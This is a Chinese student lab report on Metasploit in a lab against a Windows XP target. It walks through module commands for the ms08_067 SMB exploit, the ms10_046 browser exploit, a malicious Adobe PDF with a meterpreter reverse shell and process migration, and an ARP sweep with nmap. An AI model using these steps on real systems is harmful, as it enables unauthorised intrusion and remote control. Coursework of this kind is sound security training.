实验内容

·掌握metasploit的基本应用方式，掌握常用的三种攻击方式的思路

·（1）一个主动攻击，如ms08_067;

(2)一个针对浏览器的攻击，如ms11_050；

（3）一个针对客户端的攻击，如Adobe

（4）成功应用任何一个辅助模块。

基础问题回答

解释什么是exploit,payload,encode.

·exploit：相当于弹壳，将攻击包传输到靶机。

·payload: 抵达靶机后，执行攻击方式

·encode:对需要传输的文件进行编码，使自己免杀

实验过程

（1）ms08_067渗透攻击

·kali进入msf

·输入search ms08_067后可以找到渗透模块

·然后输入use exploit/windows/smb/ms08_067_netapi进入该模块

·show payloads显示有效的攻击载荷

·show targets显示可以被攻击的靶机操作系统型号

·set payload generic/shell_reverse_tcp设置有效攻击载荷

·输入set LHOST "kali Ip" set RHOST "Win xp Ip"设置并show options查看payload状态。

·输入exploit开始攻击

·在kali上执行ipconfig/all

·在win xp上执行同样的命令

（2）IE浏览器渗透攻击——MS10046安全漏洞

·先利用search ms10_046查看可用攻击模块

·输入命令use windows/browser/ms10_046_shortcut_icon_dllloader，进入该漏洞模块。

·info查看信息：

·设置好参数并查看，这里SRVHOST和LHOST都为Kali的IP地址：

·开始执行，可以看到生成了一个url

·在靶机的IE浏览器上使用该url进行访问，在Kali上可以看到

·使用sessions指令查看当前存在的会话，可以看到存在一个ID为1的会话：

·使用sessions -i 1选择会话1

·获取shell

（3）Adobe阅读器渗透攻击

·启动msfconsole后输入search adobe寻找可利用漏洞

·输入use exploit/windows/fileformat/adobe_jbig2decode进入该漏洞模块的使用

·使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

·设置参数

set FILENAME xxx.pdf

set LHOST "KALI Ip"

set LPORT xxxx

·输入exploit,生成pdf文件

·并可以看到pdf所在文件夹，将pdf复制到靶机里。

·使用命令back退出当前模块，并使用use exploit/multi/handler新建一个监听模块。

·使用set payload windows/meterpreter/reverse_tcp建立一个反向连接，并将参数设置为攻击模块数据相同

·使用命令exploit开始攻击，在xp中打开pdf，并用sysinfo查看靶机信息

·将进程迁移到explorer.exe.使用ps查看当前进程，并找到explorer.exe的进程号

·使用命令migrate 1884

·输入shell，查看xp靶机信息

·在靶机xp中使用命令netstat -an,看本地tcp连接。

（4）MSF的扫描

·先创建一个msf所需的数据库

·进入msf，输入命令use auxiliary/scanner/discovery/arp_sweep进入模块

·使用命令，设置

set interface eth0

set RHOSTS 172.30.1.0/21

set threads 2

·run开启扫描，结果可以看到除了自己主机的IP外，还有其他ip

·可以ping通，开启nmap扫描，可以看见开启的端口号，以及目标机的操作系统

实验收获

本次实验更加深入理解了msf的使用，学习到了各种漏洞的寻找以及攻击方式，对于以后防范这些攻击有了基础。